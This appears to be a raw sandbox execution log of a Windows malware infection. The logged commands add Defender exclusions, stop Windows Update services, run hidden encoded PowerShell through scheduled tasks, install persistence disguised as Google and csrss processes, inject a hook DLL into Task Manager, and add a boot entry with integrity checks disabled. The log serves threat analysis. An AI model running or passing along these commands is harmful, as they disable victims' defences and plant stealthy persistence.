REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gHotUrkhd" /SC once /ST 00:57:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gHotUrkhd"

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\1C41.exe

C:\Users\Admin\AppData\Local\Temp\1C41.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gHotUrkhd"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\PbWqCNl.exe\" 3Y /Wcsite_idhzQ 385119 /S" /V1 /F

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20433554855583829031540298184-5276330682383931091566865509-1853891298-983992386"

C:\Windows\system32\taskeng.exe

taskeng.exe {440CA613-EA13-4F0E-AB62-B69BC8D81E7D} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025045630.log C:\Windows\Logs\CBS\CbsPersist_20231025045630.cab

C:\Users\Admin\AppData\Local\Temp\5BC1.exe

C:\Users\Admin\AppData\Local\Temp\5BC1.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 256

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\PbWqCNl.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\PbWqCNl.exe 3Y /Wcsite_idhzQ 385119 /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gJVIIuneC" /SC once /ST 02:11:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gJVIIuneC"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gJVIIuneC"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\GeiSwTVu\WwwpkvOObBSvzBut.wsf"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\GeiSwTVu\WwwpkvOObBSvzBut.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "145705992718306988141732342371757510320-2041657288-2038609412-84331127784627912"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1508129501-837460386173141445843913750-937631947-53317891-5376385221213734389"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-8560801212039833040112772125712611864592078203770-9937240718365766811625396288"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1618884949-589767626-130821643538784940118443334119927107319842629701341157477"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 02:55:02 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\GxHiMpX.exe\" KS /AKsite_idMws 385119 /S" /V1 /F

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "948971022-591520963-930881670172668902-1063626517-16142695927343069851297284949"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1998333140-654168192899901588-1504134761169062220932637594-526016153-892665713"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-393504942202478956-1618616633-1906241188-8279283981194578958-12509665641948165780"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-4661036231720458897-92242097020903054494424943011673335259-330780787164833356"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-7946967041309245655108595011415822881184505104586737870341372857333-262166658"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1916880257632573070-201331369703468848-12229807721911818735-5540974181148481955"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\GxHiMpX.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\GxHiMpX.exe KS /AKsite_idMws 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "724890731117068846481409708649288065-84875295016548582491272603898-461806218"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\NvLzsb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\tagSTxV.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ztlTbPYifermRZH"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-480817613-20315735841380075845696059868-1977739785-139102995718904937842008446731"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ztlTbPYifermRZH"

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

